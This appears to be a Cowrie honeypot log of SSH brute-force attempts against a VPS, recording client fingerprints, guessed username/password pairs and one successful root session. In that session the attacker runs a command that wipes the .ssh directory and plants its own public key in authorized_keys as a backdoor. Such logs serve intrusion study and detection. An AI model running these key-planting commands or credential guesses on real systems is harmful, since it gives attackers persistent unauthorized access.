{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":47456,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea22c8dc4266","protocol":"ssh","message":"New connection: 216.107.136.92:47456 (1.2.3.4:22) [session: ea22c8dc4266]","sensor":"my-vps","timestamp":"2025-09-08T20:16:18.335810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:16:18.336745Z","src_ip":"216.107.136.92","session":"ea22c8dc4266"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:16:18.426800Z","src_ip":"216.107.136.92","session":"ea22c8dc4266"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"password123","message":"login attempt [gpadmin/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:16:18.826788Z","src_ip":"216.107.136.92","session":"ea22c8dc4266"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:16:19.919588Z","src_ip":"216.107.136.92","session":"ea22c8dc4266"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.89.164","src_port":55020,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dd0a53c7ef3","protocol":"ssh","message":"New connection: 101.126.89.164:55020 (1.2.3.4:22) [session: 3dd0a53c7ef3]","sensor":"my-vps","timestamp":"2025-09-08T20:16:37.282404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:16:37.286222Z","src_ip":"101.126.89.164","session":"3dd0a53c7ef3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:16:38.901869Z","src_ip":"101.126.89.164","session":"3dd0a53c7ef3"}
{"eventid":"cowrie.login.failed","username":"student1","password":"123456","message":"login attempt [student1/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T20:16:39.577020Z","src_ip":"101.126.89.164","session":"3dd0a53c7ef3"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:16:40.800791Z","src_ip":"101.126.89.164","session":"3dd0a53c7ef3"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:17:09.338404Z","src_ip":"212.227.235.229","session":"4eb9569c05fd"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":55566,"dst_ip":"1.2.3.4","dst_port":22,"session":"686a52c358fe","protocol":"ssh","message":"New connection: 77.75.56.63:55566 (1.2.3.4:22) [session: 686a52c358fe]","sensor":"my-vps","timestamp":"2025-09-08T20:17:12.079374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:17:12.081467Z","src_ip":"77.75.56.63","session":"686a52c358fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:17:12.118055Z","src_ip":"77.75.56.63","session":"686a52c358fe"}
{"eventid":"cowrie.login.failed","username":"elk","password":"password1","message":"login attempt [elk/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T20:17:12.302249Z","src_ip":"77.75.56.63","session":"686a52c358fe"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:17:13.347684Z","src_ip":"77.75.56.63","session":"686a52c358fe"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":59272,"dst_ip":"1.2.3.4","dst_port":22,"session":"af4c15ac8da3","protocol":"ssh","message":"New connection: 103.206.72.2:59272 (1.2.3.4:22) [session: af4c15ac8da3]","sensor":"my-vps","timestamp":"2025-09-08T20:17:14.889254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:17:14.892103Z","src_ip":"103.206.72.2","session":"af4c15ac8da3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:17:15.072416Z","src_ip":"103.206.72.2","session":"af4c15ac8da3"}
{"eventid":"cowrie.login.failed","username":"tests","password":"12345678","message":"login attempt [tests/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T20:17:15.787019Z","src_ip":"103.206.72.2","session":"af4c15ac8da3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:17:16.972884Z","src_ip":"103.206.72.2","session":"af4c15ac8da3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52834,"dst_ip":"1.2.3.4","dst_port":22,"session":"99f28f10d199","protocol":"ssh","message":"New connection: 217.72.205.35:52834 (1.2.3.4:22) [session: 99f28f10d199]","sensor":"my-vps","timestamp":"2025-09-08T20:17:24.092137Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:17:24.094499Z","src_ip":"217.72.205.35","session":"99f28f10d199"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":36822,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dbe1b8cda89","protocol":"ssh","message":"New connection: 77.75.56.63:36822 (1.2.3.4:22) [session: 9dbe1b8cda89]","sensor":"my-vps","timestamp":"2025-09-08T20:18:19.794381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:18:19.795269Z","src_ip":"77.75.56.63","session":"9dbe1b8cda89"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:18:19.832237Z","src_ip":"77.75.56.63","session":"9dbe1b8cda89"}
{"eventid":"cowrie.login.failed","username":"webuser","password":"Password1","message":"login attempt [webuser/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T20:18:20.018829Z","src_ip":"77.75.56.63","session":"9dbe1b8cda89"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:18:21.057218Z","src_ip":"77.75.56.63","session":"9dbe1b8cda89"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":52646,"dst_ip":"1.2.3.4","dst_port":22,"session":"b30c136ce687","protocol":"ssh","message":"New connection: 103.206.72.2:52646 (1.2.3.4:22) [session: b30c136ce687]","sensor":"my-vps","timestamp":"2025-09-08T20:18:35.741366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:18:35.745754Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:18:35.923043Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123@","message":"login attempt [root/qwe123@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:18:36.635484Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:18:37.052377Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:18:37.053137Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:18:37.054270Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:18:37.235533Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:18:37.607453Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:18:37.608147Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:18:37.793696Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:18:37.794524Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":52756,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ecb5bfe7d7b","protocol":"ssh","message":"New connection: 103.206.72.2:52756 (1.2.3.4:22) [session: 3ecb5bfe7d7b]","sensor":"my-vps","timestamp":"2025-09-08T20:18:37.993306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:18:37.998215Z","src_ip":"103.206.72.2","session":"3ecb5bfe7d7b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:18:38.187430Z","src_ip":"103.206.72.2","session":"3ecb5bfe7d7b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:18:38.951296Z","src_ip":"103.206.72.2","session":"3ecb5bfe7d7b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:18:40.146383Z","src_ip":"103.206.72.2","session":"3ecb5bfe7d7b"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":52758,"dst_ip":"1.2.3.4","dst_port":22,"session":"827298ffb1ad","protocol":"ssh","message":"New connection: 103.206.72.2:52758 (1.2.3.4:22) [session: 827298ffb1ad]","sensor":"my-vps","timestamp":"2025-09-08T20:18:40.306794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:18:40.310509Z","src_ip":"103.206.72.2","session":"827298ffb1ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:18:40.483396Z","src_ip":"103.206.72.2","session":"827298ffb1ad"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:18:41.175816Z","src_ip":"103.206.72.2","session":"827298ffb1ad"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:18:41.353822Z","src_ip":"103.206.72.2","session":"b30c136ce687"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:18:41.354974Z","src_ip":"103.206.72.2","session":"827298ffb1ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38784,"dst_ip":"1.2.3.4","dst_port":23,"session":"b153112554cf","protocol":"telnet","message":"New connection: 212.227.125.160:38784 (1.2.3.4:23) [session: b153112554cf]","sensor":"my-vps","timestamp":"2025-09-08T20:18:46.979443Z"}
{"eventid":"cowrie.session.closed","duration":"301.6","message":"Connection lost after 301.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:19:17.887257Z","src_ip":"14.103.117.69","session":"363700e7381c"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":34950,"dst_ip":"1.2.3.4","dst_port":22,"session":"80a054f72b9b","protocol":"ssh","message":"New connection: 77.75.56.63:34950 (1.2.3.4:22) [session: 80a054f72b9b]","sensor":"my-vps","timestamp":"2025-09-08T20:19:24.754778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:19:24.755687Z","src_ip":"77.75.56.63","session":"80a054f72b9b"}
